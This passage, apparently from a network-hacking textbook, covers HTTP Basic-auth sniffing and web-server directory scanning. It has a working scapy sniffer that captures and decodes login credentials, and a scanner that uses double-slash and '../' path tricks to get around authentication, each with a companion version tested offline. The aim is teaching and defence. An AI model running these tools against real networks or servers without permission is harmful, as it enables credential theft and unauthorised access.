Understanding Network Hacks
7.7 HTTP-Auth Sniffing

Most HTTP authentication still runs in the so-called Basic mode. Many administrators do not realise that with this method the login data crosses the network in plaintext: the user name and password are only Base64-encoded before being sent, and Base64 is an encoding, not encryption, so anyone who can read the packets can decode it. Basic authentication is only acceptable when the whole connection is protected by TLS. A short script demonstrates how easy it is for an attacker to grab such HTTP logins from unencrypted traffic.

#!/usr/bin/env python3

import re
from base64 import b64decode
from scapy.all import sniff

dev = "wlan0"

# Basic credentials travel as "Authorization: Basic <base64(user:password)>"
AUTH_RE = re.compile(rb"Authorization: Basic ([A-Za-z0-9+/=]+)")

def handle_packet(packet):
    if not packet.haslayer("TCP"):
        return
    tcp = packet.getlayer("TCP")
    # bytes() gives the raw segment payload; str() would only give scapy's summary
    match = AUTH_RE.search(bytes(tcp.payload))

    if match:
        auth_str = b64decode(match.group(1)).decode("utf-8", "replace")
        # A password may itself contain ':', so split only at the first colon
        user, _, password = auth_str.partition(":")
        print("User: " + user + " Pass: " + password)

sniff(iface=dev,
      store=0,
      filter="tcp and port 80",
      prn=handle_packet)

Once more we use the much loved Scapy function sniff to read the HTTP traffic and extract the TCP layer in handle_packet() to get at the real payload. In the payload we search for the string Authorization: Basic and cut out the Base64 string that follows it with a regular expression. If that succeeds the string is decoded and split at the first colon into user name and password (a password may itself contain a colon, so splitting at every colon would mangle it). That's all it takes to read HTTP Basic credentials off the wire! Digest authentication at least keeps the password itself out of the request, but its challenge/response can still be captured and cracked offline, and neither scheme protects the rest of the session. So do yourself a favor and serve anything protected by HTTP Auth over HTTPS only; that is what makes Basic authentication acceptable in the first place.
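The same extraction can be exercised without scapy, a root shell or a live interface. The following is an added example and not code from the book: it runs the credential extraction over HTTP requests held in memory (constructed below, not a real capture) and covers the cases the one-line regex in the sniffer misses. Header names and the scheme word are case-insensitive, the same token also travels in a Proxy-Authorization header, a password may itself contain a colon, and a malformed token must be skipped rather than crash the sniffer. The host names and credentials in the samples are made up.

```python
#!/usr/bin/env python3
"""Offline companion to the Basic-auth sniffer: added example, not the book's code."""
import base64
import binascii
import re

# Both header names carry a "Basic <base64(user:password)>" token (RFC 7617).
# Header name and scheme are case-insensitive, hence IGNORECASE; MULTILINE
# anchors each match at the start of a header line.
BASIC_RE = re.compile(
    rb"^(?:Proxy-)?Authorization:[ \t]*Basic[ \t]+([A-Za-z0-9+/=]+)",
    re.IGNORECASE | re.MULTILINE,
)


def extract_basic_credentials(payload):
    """Return [(header_name, user, password), ...] found in one raw TCP payload."""
    found = []
    for m in BASIC_RE.finditer(payload):
        header = m.group(0).split(b":", 1)[0].decode("ascii").lower()
        try:
            decoded = base64.b64decode(m.group(1), validate=True)
        except binascii.Error:
            continue                      # odd token: skip it, keep sniffing
        user, sep, password = decoded.partition(b":")
        if not sep:                       # no colon: not a user:password pair
            continue
        found.append((header,
                      user.decode("utf-8", "replace"),
                      password.decode("utf-8", "replace")))
    return found


def credentials_from_capture(payloads):
    """Flatten the credentials found over a sequence of payloads."""
    return [cred for payload in payloads for cred in extract_basic_credentials(payload)]


def _basic_line(name, userpass):
    """Build one credential header line the way a client would send it."""
    return name + b": Basic " + base64.b64encode(userpass) + b"\r\n"


# Constructed traffic, not a real capture: what the requests look like on port 80.
SAMPLE_PAYLOADS = [
    # exactly the shape the book's regex expects
    b"GET /admin/ HTTP/1.1\r\nHost: cam.example\r\n"
    + _basic_line(b"Authorization", b"root:pass") + b"\r\n",
    # lower-case header and scheme, password containing a colon
    b"GET /cgi-bin/ HTTP/1.1\r\nHost: cam.example\r\n"
    b"authorization: basic " + base64.b64encode(b"alice:s3cr:et") + b"\r\n\r\n",
    # credential for an upstream proxy rather than the origin server
    b"GET http://intranet.example/ HTTP/1.1\r\nHost: intranet.example\r\n"
    + _basic_line(b"Proxy-Authorization", b"bob:hunter2") + b"\r\n",
    # malformed token: must be skipped, not crash the sniffer
    b"GET / HTTP/1.1\r\nHost: cam.example\r\nAuthorization: Basic abc\r\n\r\n",
    # no credentials at all
    b"GET / HTTP/1.1\r\nHost: cam.example\r\n\r\n",
]

if __name__ == "__main__":
    for header, user, password in credentials_from_capture(SAMPLE_PAYLOADS):
        print("%s -> User: %s Pass: %s" % (header, user, password))
```

To plug this into the sniffer, call extract_basic_credentials(bytes(tcp.payload)) from handle_packet() instead of the single regex; the function returns an empty list for packets without credentials, so no further checks are needed there.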

7.8 Webserver Scanning

On almost all web servers the author has seen so far, at least one file or directory existed that should not have been shared with the whole world but was, thanks to the web server's configuration. There is a general misconception that such a file or directory cannot be found because it is not linked from any web page.

With a few lines of Python code, armed with a dictionary that lists one possible unlinked but interesting file or directory name per line, we will prove this assumption wrong. One of the basic rules of IT security is that "security by obscurity" doesn't work.

First of all, create a dictionary file like the following. Better dictionaries can for example be found bundled with the tool Chaosmap (see Sect. 7.15).

old
admin
doc
documentation
backup
transfer
lib
include
sql
conf

The dictionary file is iterated in a for loop, entry by entry. For each entry we first prepend a single slash, then two slashes, because some web servers are misconfigured in a way that their authentication mechanism only triggers on the exact single-slash path. The most popular example of this kind is probably the web server built into Axis surveillance cameras (see packetstormsecurity.org/files/31168/core.axis.txt).

Last but not least, we try to reach the entry through a directory traversal, which steps into the parent directory by prepending "../" to the entry (here as /test/../). The manipulated path is appended to the base URL and the result is sent to the web server. Note that a 200 status is only a hint, not proof: a server that answers every unknown path with a friendly page, or redirects it to a login form, will report everything as found. Compare against a request for a path that certainly does not exist, and pay attention to 401 and 403 answers as well, since they tell you the resource exists but is protected.

If the script is run in file mode we append a list of typical backup suffixes to every entry, such as a tilde, .old or .bak, to find forgotten backup copies of files.

#!/usr/bin/env python3

import sys
import getopt
import httplib2

# Try to get url from server
def surf(url, query):
    print("GET " + query)

    try:
        response, content = web_client.request(url)

        if response.status == 200:
            print("FOUND " + query)
    except httplib2.ServerNotFoundError:
        print("Got error for " + url +
              ": Server not found")
        sys.exit(1)


# Dictionary file
query_file = "web-queries.txt"

# Target http server and port
host = "localhost"
port = 80

# Run in file mode?
file_mode = False

# Parsing parameter
try:
    cmd_opts = "f:Fh:p:"
    opts, args = getopt.getopt(sys.argv[1:], cmd_opts)
except getopt.GetoptError:
    print(sys.argv[0] + """
    -f <query_file>
    -F(ile_mode)
    -h <host>
    -p <port>""")
    sys.exit(0)

for opt in opts:
    if opt[0] == "-f":
        query_file = opt[1]
    elif opt[0] == "-F":
        file_mode = True
    elif opt[0] == "-h":
        host = opt[1]
    elif opt[0] == "-p":
        port = int(opt[1])      # getopt hands back a string

# Build the base url; httplib2 needs an explicit scheme
if port == 443:
    base_url = "https://" + host
elif port != 80:
    base_url = "http://" + host + ":" + str(port)
else:
    base_url = "http://" + host

# This pattern will be added to each query
salts = ('~', '~1', '.back', '.bak',
         '.old', '.orig', '_backup')

# Get a web browser object
web_client = httplib2.Http()

# Read dictionary and handle each query
for query in open(query_file):
    query = query.strip()       # also drops the trailing newline
    if not query:
        continue

    # Try single slash, double slash and directory traversal
    for dir_sep in ['/', '//', '/test/../']:
        path = dir_sep + query  # build each url afresh instead of growing one string

        if file_mode:
            for salt in salts:
                surf(base_url + path + salt, path + salt)
        else:
            surf(base_url + path, path)
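The scanner above treats every 200 as a hit. The following is an added example, not the book's code, that keeps the same three path variants but records the status each one returns and classifies the dictionary entry from that: a 401 or 403 on /admin together with a 200 on //admin or /test/../admin is exactly the single-slash authentication bug described above. It also probes a path that cannot exist to recognise catch-all servers, and it does not follow redirects, so a login page at the end of a 302 is not reported as found. The target at the bottom is a constructed, hypothetical server with that bug, run in-process so the script works offline; it is not any real product, and the dictionary entries passed to it are made up.

```python
#!/usr/bin/env python3
"""Status-aware variant of the scan loop: added example, not the book's code."""
import threading
import urllib.error
import urllib.request
import uuid
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

VARIANTS = ("/", "//", "/test/../")


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface a 3xx as its own status instead of following it."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


OPENER = urllib.request.build_opener(NoRedirect)


def status_of(url):
    """HTTP status of a GET to url, or None if the server is unreachable."""
    try:
        with OPENER.open(url, timeout=5) as resp:
            return resp.status
    except urllib.error.HTTPError as e:      # 3xx/4xx/5xx still carry a status
        return e.code
    except urllib.error.URLError:
        return None


def classify(statuses, catch_all=False):
    """statuses maps each VARIANTS entry to its status; returns a verdict string."""
    plain = statuses.get("/")
    bypass_paths = [statuses.get(v) for v in VARIANTS[1:]]
    if plain in (401, 403) and 200 in bypass_paths:
        return "auth-bypass"      # gated only on the exact path, as in the camera case
    if plain in (401, 403):
        return "protected"        # exists, and the gate holds for every spelling
    if plain is not None and 300 <= plain < 400:
        return "redirect"         # follow by hand; often a catch-all login page
    if 200 in statuses.values():
        return "unverified" if catch_all else "open"
    return "absent"


def scan(base_url, queries):
    """Return {query: verdict} for every dictionary entry."""
    probe = "/" + uuid.uuid4().hex               # a path that certainly does not exist
    catch_all = status_of(base_url + probe) == 200
    results = {}
    for query in queries:
        statuses = {v: status_of(base_url + v + query) for v in VARIANTS}
        results[query] = classify(statuses, catch_all)
    return results


class FakeTarget(BaseHTTPRequestHandler):
    """Hypothetical target: gates /admin on authentication but compares the raw
    request path, so any other spelling of it slips through."""
    def do_GET(self):
        raw_path = self.requestline.split()[1]   # as sent, before http.server normalises it
        if raw_path == "/admin":
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="admin"')
        elif raw_path.endswith("admin") or raw_path.endswith("/doc"):
            self.send_response(200)
        else:
            self.send_response(404)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):                # keep the demo output clean
        pass


def start_fake_target():
    """Start the constructed target on a free loopback port; returns (server, base_url)."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), FakeTarget)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, "http://127.0.0.1:%d" % server.server_address[1]


if __name__ == "__main__":
    server, base_url = start_fake_target()
    for query, verdict in scan(base_url, ["admin", "doc", "sql"]).items():
        print("%-6s %s" % (query, verdict))
    server.shutdown()
```

Against the constructed target, admin is reported as auth-bypass (401 on /admin, 200 on the other two spellings), doc as open and sql as absent. To point the classifier at a real host, replace start_fake_target() with the base URL built from -h and -p, and keep the file-mode salts by appending them to query before the variants are applied.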

 